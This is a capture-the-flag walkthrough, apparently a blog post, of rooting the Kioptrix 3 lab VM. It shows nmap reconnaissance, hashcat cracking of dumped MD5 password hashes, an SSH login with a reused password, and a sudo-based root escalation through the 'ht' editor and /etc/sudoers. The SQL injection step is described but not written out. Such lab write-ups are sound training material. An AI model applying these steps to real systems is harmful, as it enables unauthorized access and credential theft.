Rooting Kioptrix 3 Walkthrough

Overview

Kioptrix 3 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Vulnerabilities Exploited:

  • SQL Injection
  • Password reuse
  • Sudo Misconfiguration

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 3 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Reconnaissance/Scanning

I used netdiscover to find ip address of target VM.

#netdiscover

Target VM IP Address: 192.168.8.105

I modified my /etc/hosts file as guided by author of the VM. https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

root@kali:~# cat /etc/hosts

192.168.8.105  kioptrix3.com

Next, i used namp to find opened ports/services on target machine.

root@kali:~# nmap -p- -A 192.168.8.105

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 00:02 EDT
Nmap scan report for 192.168.8.105
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:62:9A:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.8.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds

Guess what, Found a website hosted on port 80. Lets explore website in browser…

In comments, found gallery admin panel.

So, title of login page tells me that target gallery is by Gallarific Photo Gallery.

Exploitation

quick googling display sql injection in Gallarific Photo Gallery.

 

Using SQL Injection, dumped plain text admin username and password.

and logged into Gallarific Gallery

 

Ooops, no further proceeding this way. We can not do much with this admin panel.

Lets use sql injection to read local file system. Reading /etc/passwd, /etc/group, /etc/my.cnf is successful, but no other local configuration file is readable.

Lets check for other databases and tables using sql injection.

Found 2 default databases, with only “gallery” as user created database. Lets find tables in gallery database.

Hm… dev_accounts seems interesting table name. Lets find columns…

and dump username:password

I cracked these hashes with hashcat.

 

root@kali:~# hashcat -m 0 -a 0 --force  -o found1.txt  hashes.txt /root/rockyou.txt

hashcat (v4.0.1) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz, 512/1493 MB allocatable, 4MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
 
Password length minimum: 0
Password length maximum: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
Dictionary cache hit:
* Filename..: /root/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Wed May 30 05:06:33 2018 (5 secs)
Time.Estimated...: Wed May 30 05:06:38 2018 (0 secs)
Guess.Base.......: File (/root/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  3110.3 kH/s (0.68ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10838016/14344385 (75.56%)
Rejected.........: 0/10838016 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> March3490
HWMon.Dev.#1.....: N/A

Started: Wed May 30 05:06:32 2018
Stopped: Wed May 30 05:06:39 2018
root@kali:~# cat found1.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
root@kali:~#

//dreg:Mast3r // dreg dont have sudo privilege,

//loneferret:starwars // loneferret have sudo privilege

 

root@kali:~# ssh loneferret@192.168.8.105
loneferret@192.168.8.105's password:
Permission denied, please try again.
loneferret@192.168.8.105's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Wed May  9 15:35:14 2018 from 192.168.8.103
loneferret@Kioptrix3:~$

Privilege Escalation

loneferret@Kioptrix3:~$ cat CompanyPolicy.README  // company policy says, use sudo ht:)
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
 
DG
CEO
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo ht

Lets edit /etc/sudoers to grant loneferret sudo access


Lets confirm sudo access

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret#

and got root access!!!

References

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s